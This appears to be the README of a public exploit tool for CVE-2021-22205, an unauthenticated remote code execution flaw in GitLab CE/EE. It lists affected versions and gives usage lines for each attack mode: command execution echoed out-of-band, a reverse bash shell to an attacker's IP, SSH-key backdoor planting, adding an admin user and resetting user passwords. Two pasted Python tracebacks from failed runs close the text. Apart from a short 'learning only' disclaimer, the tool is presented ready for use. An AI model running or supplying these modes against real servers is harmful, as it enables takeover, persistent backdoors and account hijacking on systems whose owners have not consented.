GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

>=11.9, <13.8.8
>=13.9, <13.9.6
>=13.10, <13.10.3

Features

Gitlab version detection through the hash in Webpack manifest.json
Automatical out-of-band interactions with DNSLog & PostBin
Support Reverse Bash Shell / Append SSH Key to authorized_keys
Support ENTER to modify and restore gitlab user password

Usage

🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # 版本 & 漏洞探测
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # 命令执行 OOB 回显
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # 命令执行写文件回显
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # 反弹 SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH 后门植入
    python3 CVE-2021-22205.py -u site_url -m add user pass # 添加管理用户
    python3 CVE-2021-22205.py -u site_url -m mod user      # 修改 user 密码 => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # 还原 user 密码

Screenshot

Detect:

RCE(Echo via PostBin OOB):

Reverse Bash Shell:

Append SSH Key to authorized_keys:

Gitlab user password modification and restoration:

Reference

its show me when i run command python3 CVE-2021-22205.py -u http://target.com -m detect
its show File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 1074, in grce.step2(method=console.method, cmd=console.cmd,
File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 176, in step2 self.oob_init() File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 125, in oob_init self.reqb.create_bin() File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 95, in create_bin self.bin_id = json.loads(resp.text)['name'] File "/usr/local/lib/python3.10/json/init.py", line 346, in loads return _default_decoder.decode(s) File "/usr/local/lib/python3.10/json/decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "/usr/local/lib/python3.10/json/decoder.py", line 355, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

Traceback (most recent call last): File "CVE-2021-22205.py", line 1075, in ip=console.ip, port=console.port, user=console.user, passwd=console.passwd) File "CVE-2021-22205.py", line 219, in step2 self.oob_init() File "CVE-2021-22205.py", line 125, in oob_init self.reqb.create_bin() File "CVE-2021-22205.py", line 95, in create_bin self.bin_id = json.loads(resp.text)['name'] File "/usr/lib64/python3.6/json/init.py", line 354, in loads return _default_decoder.decode(s) File "/usr/lib64/python3.6/json/decoder.py", line 339, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "/usr/lib64/python3.6/json/decoder.py", line 357, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)